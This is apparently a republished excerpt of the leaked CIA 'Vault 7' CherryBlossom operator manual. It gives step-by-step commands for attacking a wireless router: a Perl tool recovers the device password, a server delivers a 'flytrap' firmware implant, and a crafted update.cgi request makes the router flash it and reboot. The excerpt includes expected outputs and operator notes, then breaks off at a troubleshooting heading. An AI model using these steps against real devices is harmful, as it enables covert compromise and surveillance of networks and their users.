Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
1. Open a cygwin shell, cd to <HOME>/<PACKAGE>, and
run:
perl cisc0wn-2.00.08.pl <DEVICE IP>
In about 15 seconds, the program should return the device's password.
NOTE: the most common case of failure here is running the program against
a device that already is already running a CB firmware. See the
"TROUBLESHOOTING AND DEVICE RECOVERY" section for how to get out of this
situation.
2. From the same cygwin shell, run the following:
./update_server.exe 2313 <SQSH_FILE>
Where <SQSH_FILE> is the .sqsh image to deploy to the device. NOTE that
each <SQSH_FILE> has a corresponding flytrap.config.<SQSH_FILE> that shows
it's configuration. Be sure to specify the appropriate file.
The update_server.exe program should report:
Image Size: nnnnnnnn
Waiting for client connection
3. Open a browser (IE) and go to the following url:
http://<DEVICE IP>/update.cgi?<WIRELESS CLIENT IP>+2313
For example, if the <DEVICE IP> is 192.168.1.1, and the
<WIRELESS CLIENT IP> is 192.168.1.100, go to:
http://192.168.1.1/update.cgi?192.168.1.100+2313
An authentication box should pop up (unless you have previously
authenticated). Enter the password from step 1, and leave the username
field blank.
4. The cygwin shell from step 2 should nearly immediately report:
Connection Accepted
bytesSent nnnnnnnn
Sent nnnnnnnn bytes
At this point the <SQSH_FILE> has been uploaded to the device's RAM, and
writing to flash has begun. Note at this point, the operator can leave.
5. After about 50 seconds, assuming a constant connection, the cygwin shell
from step 2 should report:
Update succeeded
Waiting for client connection
At this point, the <SQSH_FILE> has been written to flash, and the device
is going to reboot.
If the operator loses connection at some point, the cygwin shell will report:
Failed to receive status
Waiting for client connection
and the device will not be able to report the "Update succeeded" status.
As long as the cygwin shell has reported Connection Accepted as in step 4,
and the device is not power-cycled during the 50 seconds of flash writing,
the upgrade should succeed. See the "TROUBLESHOOTING AND DEVICE RECOVERY"
section if any problems arise.
6. The device takes 30-60 seconds to reboot -- the operator should see the
wireless network go down for this period of time.
TROUBLESHOOTING AND DEVICE RECOVERY:
62